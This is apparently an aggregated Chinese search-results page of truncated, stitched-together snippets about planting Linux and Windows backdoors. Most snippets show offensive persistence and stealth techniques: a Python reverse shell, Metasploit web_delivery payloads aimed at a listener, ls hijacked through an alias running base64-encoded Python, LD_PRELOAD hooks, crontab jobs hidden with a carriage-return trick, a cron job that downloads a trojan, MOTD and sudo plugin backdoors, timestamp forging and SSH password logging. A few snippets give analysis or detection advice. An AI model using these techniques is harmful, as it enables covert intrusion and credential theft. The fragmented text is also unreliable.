python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET...我之前的想法是,python首先新建一个socket监听端口等待连接。...只要把python关掉,那边才会返回一个结果。 ...这也是C语言下零管道后门的原理。 但不知道为什么,我写了一个windows版本,总是报错: ? ...以上是我对python下正向连接shell的分析,希望能帮到同样有困惑的人,其中纰漏与错误,能得到大家的斧正!
,已经不再自带python2 https://docs.python.org/zh-cn/3/using/cmdline.html 接下来我们来探究一下 python3 自身的参数,看一下man手册吧...所以思路来了: 要保证我们后门的名字和模块的名字一样 我们的后门路径要优先被索引 最好名称能正常一点或者以 ....纵观默认的整个 sys.path ,好像只有两个是比较适合留shell的(每个人对这个后门的想法多少还是有点不一样) _sysconfigdata_m.py lsb_release.py 我们还是使用...没想到 /usr/lib/python3.5/ 目录下还有一个跟这个文件名类似的文件,简直不要太好,我们看看文件内容,好决定怎么留后门,截取一小部分 ? ?...oQK9NnOnM3J7xCZoMWZ4VmCpkCZo4WZs1CboY3YlJnLz1zKklgC6wGPpQGKuVGbgUGbph2dKkCboY3YlJnLz1DZK0FMblSK0gidjVmcuMHLnkkPngyajFGcuVnL0NWdyR 这下好了,有六个部分,分别放在6个文件中进行存储后拼接成一个后门
成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法...+python3 +python3 功能允许你使用 Python 3 解释器来执行脚本和扩展 Vim 的功能。...它提供了与 Python 3 的无缝集成,使你能够编写、运行和调试 Python 代码 vim 与 python3 主要通过以下三个命令或函数进行交互(从留后门的角度看) 1) python3 或 py3...python3命令用于在Vim中执行一段Python代码,类似于在Python解释器中输入代码并运行 2) py3file py3file命令用于在Vim中执行Python 3脚本文件 3)...'The result is ' . result 当然,py3eval 也可以用来执行其他 python3 代码 网络上关于 vim 后门使用的比较常见的是 py3file ,实际上可以利用的命令或者函数还是有很多的
有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...1) 简介 大家日常可能使用 sudo 比较多,但实际上去完整读一读它的 man 手册的估计不多,其实 sudo 在 1.8 版本之后开始支持插件了,还支持了 Python 版本的 API 说到这里就不得不谈一下...2) Metasploit 生成 payload 并监听 msfconsole -q > use exploit/multi/script/web_delivery > set payload python.../meterpreter/reverse_tcp > set lhost 192.168.31.71 > set lport 4444 > exploit payload 为 python -..._create_unverified_context());exec(r.read());" 这里我们得改造一下,因为新版本的 Ubuntu 已经不再自带 python2 /usr/bin/python3
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...就使用 alias + python3 劫持 ls alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec...后门 ?
how-tos for configuring the OpenSSH client LocalCommand 参数含义:当连接远程主机成功后,在本地计算机执行的命令 使用msf进行测试 msf设置监听 python..._create_unverified_context());exec(r.read());" python3 -c "import sys;import ssl;u=__import__('urllib
3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
int (*new_puts)(const char *message); int result; new_puts = dlsym(RTLD_NEXT, "puts"); system("python3...加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以还是需要通过修改系统时间来进行 0x07 Ubuntu Server 22.10 实验 Ubuntu Server 即使断网使用 date -s 来修改系统时间,系统时间也会马上恢复 还是以 alias 后门那篇文章里的后门为例...给后门程序添加可执行权限(配置文件先将权限设置成和release-upgrades相同) chmod +x /tmp/release-update 用系统时间覆盖硬件时间 sudo hwclock.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
/cgi-bin/backdoor.cgi python -m http.server --cgi wget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...修改默认脚本 新建恶意脚本 修改默认脚本 msf 生成基于 python 的 payload 组合后的 payload python3 -c "exec(__import__('base64').b64decode...,但是考虑很多兄弟没看过之前的文章,所以这次重提一下 这个点说透以后,能用来做后门的可就不止 motd 这一个组件了,你可以想象一下,得有多少地方会使用 source或 ....这个可扩展性太强了,我在之前的文章中已经说过一部分了,大家可以继续思考,做出更多隐蔽的后门方法,同时呢,也是给这些做应急响应的兄弟提个醒,可以从某些角度去发现恶意程序 motd 脚本中涉及的 python
什么是后门 后门程序是一种恶意软件类型,它会阻止正常的身份验证过程访问系统。因此,远程访问被授予应用程序内的资源,例如数据库和文件服务器,从而使犯罪者能够远程发布系统命令并更新恶意软件。...Webserver后门用于许多恶意活动,其中包括: 数据盗窃 网站瑕疵 服务器劫持 启动分布式拒绝服务(DDoS)攻击 感染网站访问者(水坑攻击) 高级持续威胁(APT)攻击 后门木马安装 最流行的后门安装方法涉及远程文件包含...它启动第二阶段 - 在服务器上下载并安装后门脚本。 后门壳去除的挑战 一旦安装,后门是非常难以清除的。传统上,检测涉及使用软件扫描程序在服务器文件系统中搜索已知的恶意软件签名。...即使检测到后门,典型的缓解方法(甚至系统重新安装)也不可能将其从应用程序中移除。对于在可重写存储器中持续存在的后门来说尤其如此。...用INCAPSULA减轻后门外壳攻击 在Imperva Incapsula,我们使用多种方法来防止后门安装,以及检测和隔离现有的后门外壳。
Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 这些配置文件中都可以类似 Bash 配置文件一样,在其中放置后门程序...在第一个后门文件中额外插入powershell 代码,将 I am a Backdoor 写入到桌面的 backdoor.txt 中 先是在 cmd 中进行测试 powershell ..../demo.ps1 删除 backdoor.txt 图形化右键执行 demo.ps1 也就是说这类后门对所有的 powershell 程序有效
ICMP后门 前言 这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了。...本次就以ICMP协议进行分析,并使用Python开发出一个ICMP远控后门,在写这篇文章的之前,我感觉大家对ICMP协议肯定不会很了解,因此将ICMP后门的实现分成几篇进行讲解,循序渐进。...本篇就讲解一下ICMP协议的内容,并使用Python实现一个简单的ping。 ? 第一节 ICMP协议是什么鬼? 不知道大家有没有ping过百度,用来测试自己的网络是不是畅通,如下图所示。...第三节 ping实现 在上面我们简单讲解了ICMP的报文格式,接下来我们使用Python3根据报文格式简单实现一下ping功能,主要用到了raw socket技术,即原始套接字,使用struct pack...计算方法如下: ICMP首部和数据整个内容看成16比特整数序列(按网络字节顺序), 对每个整数分别计算其二进制反码,然后相加 再对结果计算一次二进制反码而求得 测试ping效果 注意使用管理员权限运行Python
一、shift粘贴键后门介绍 Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。...(辅助功能镜像劫持是一样的原理) 二、shift粘贴键后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows...Server2012 IP: 192.168.226.128 2.1 创建shift粘贴键后门 粘滞键的启动程序在C盘的Windows/system32目录下为sethc.exe。...cmd路径:C:\Windows\system32\cmd.exe 2.2 验证shift粘贴键后门 shift粘贴键后门创建完成之后,在锁屏状态下连按次shift粘贴键,C:\Windows...NT \ CurrentVersion \ Image File ExecutionOption 双击sethc.exe文件就会进入注册表,查看注册表键值,确实被植入了shift粘贴键后门
在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。...后门分析 最近关于讲phpstudy的文章很多,不过我只得到一个信息,后门在php_xmlrpc.dll文件中,有关键词:"eval(%s(%s))"。得知这个信息后,就降低了前期的工作难度。...研究了后门类型后,再来看看什么情况下会进入该函数触发该后门。...从这里可以知道,只要php成功加载了存在后门的xmlrpc.dll,那么任何只要构造对应的后门请求头,那么就能触发后门。在Nginx服务器的情况下就算请求一个不存在的路径,也会触发该后门。...修复方案也很简单,把php的php_xmlrpc.dll替换成无后门的版本,或者现在直接去官网下载,官网现在的版本经检测都不存后门。
这个后门真的又可怕又好用... 网上流传的都是Centos的版本,因为场景不同,我研究了一下针对Ubuntu,大同小异。...记录登录到本机的用户名和密码 */ #define OLOG "/tmp/.olog" /* 记录本机登录到远程的用户名和密码 */ #define SECRETPW "test" /* 后门的密码...记录登录到本机的用户名和密码 */#define OLOG "/tmp/.olog" /* 记录本机登录到远程的用户名和密码 */#define SECRETPW "test" /* 后门的密码...ilog user:password --> root:toor 再用我们的后门密码...test,可以发现,只记录正常的密码,我们的后门密码并不记录。
在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。 2....后门分析 最近关于讲phpstudy的文章很多,不过我只得到一个信息,后门在php_xmlrpc.dll文件中,有关键词:"eval(%s(%s))"。得知这个信息后,就降低了前期的工作难度。...研究了后门类型后,再来看看什么情况下会进入该函数触发该后门。...从这里可以知道,只要php成功加载了存在后门的xmlrpc.dll,那么任何只要构造对应的后门请求头,那么就能触发后门。在Nginx服务器的情况下就算请求一个不存在的路径,也会触发该后门。...修复方案也很简单,把php的php_xmlrpc.dll替换成无后门的版本,或者现在直接去官网下载,官网现在的版本经检测都不存后门。
现实生活中有前门后门之分,前门一般守卫严格,难以突破,然而后门计较隐蔽,部位广大人们所知道,所以守卫比较松懈基本无人问津,所以后门的安全性很弱不能跟前门相比。...后门从其连接特性上可以分为两类,一是主动型、二是被动型。主动型后门像回连木马,它会在特定的时间向控制端发送连接请求,一旦连接成功,就形成一个后门通道然后就可以为所欲为。...后门的存在大部分的情况是在公司内部已经被入侵的情况下,如何清理后门是作为安全人员的一大难题,想要清理后门必须要对后门的种类、可能存在位置以及不同后门的特性了如指掌,需要知道攻击者留后门的各种手法,你只有懂的比攻击者多那么你才能发现它留下后门的踪迹...提了这么多的后门技术,我们如何查找这些后门呢? 1、对于账号类后门,我们可以监控账号变更、使用情况,这个还是比较容易发现问题并且得到解决。...,然后再根据不同类型后门的特性去查找后门。
领取专属 10元无门槛券
手把手带您无忧上云